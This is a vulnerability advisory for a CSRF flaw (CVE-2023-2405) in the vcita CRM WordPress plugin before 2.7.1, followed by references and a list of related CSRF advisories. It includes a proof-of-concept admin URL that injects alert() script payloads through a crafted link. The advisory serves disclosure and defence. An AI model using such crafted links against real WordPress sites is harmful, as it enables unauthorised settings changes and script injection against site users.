CRM and Lead Management by vcita < 2.7.1 – Settings Update Via CSRF | CVE 2023-2405 | Plugin Vulnerabilities

Description

The plugin does not protect its settings page against CSRF attacks, allowing an unauthenticated attacker to change the plugin's settings, and on older versions (<= 2.7.0), inject arbitrary web-scripts, by tricking a logged in user with the contributor role or higher to click a link.

Proof of Concept

https://example.com/wp-admin/admin.php?page=crm-customer-relationship-management-by-vcita/vcita-callback.php&success=true&first_name=a-a&last_name=b&title=c&confirmation_token=d&confirmed=true&engage_delay=1&implementation_key=1&email=a“/><script>alert(1);</script>&uid=a”</script><script>alert(2);</script>

Affects Plugins

crm-customer-relationship-management-by-vcita

Fixed in 2.7.1

References

CVE

URL

https://blog.jonh.eu/blog/security-vulnerabilities-in-wordpress-plugins-by-vcita

URL

https://plugins.trac.wordpress.org/browser/crm-customer-relationship-management-by-vcita/trunk/vcita-callback.php

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Jonas Höbenreich

Verified

No

WPVDB ID

6c2e9ace-8fb4-426a-82fa-bb8b6f7d6fb8

Timeline

Publicly Published

2023-06-02 (about 2 years ago)

Added

2023-06-04 (about 2 years ago)

Last Updated

2025-07-24 (about 9 months ago)

Other

Published

Title

Published

2014-08-01

Title

drawblog - CSRF

Published

2015-09-07

Title

Contact Form Generator < 2.5.5 - Multiple Cross-Site Request Forgery (CSRF)

Published

2024-06-12

Title

WPQA < 6.1.1 - Arbitrary Category and Tag Follow/Unfollow via CSRF

Published

2025-01-07

Title

SingSong <= 1.2 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2025-04-09

Title

User Registration Using Contact Form 7 < 2.5 - Cross-Site Request Forgery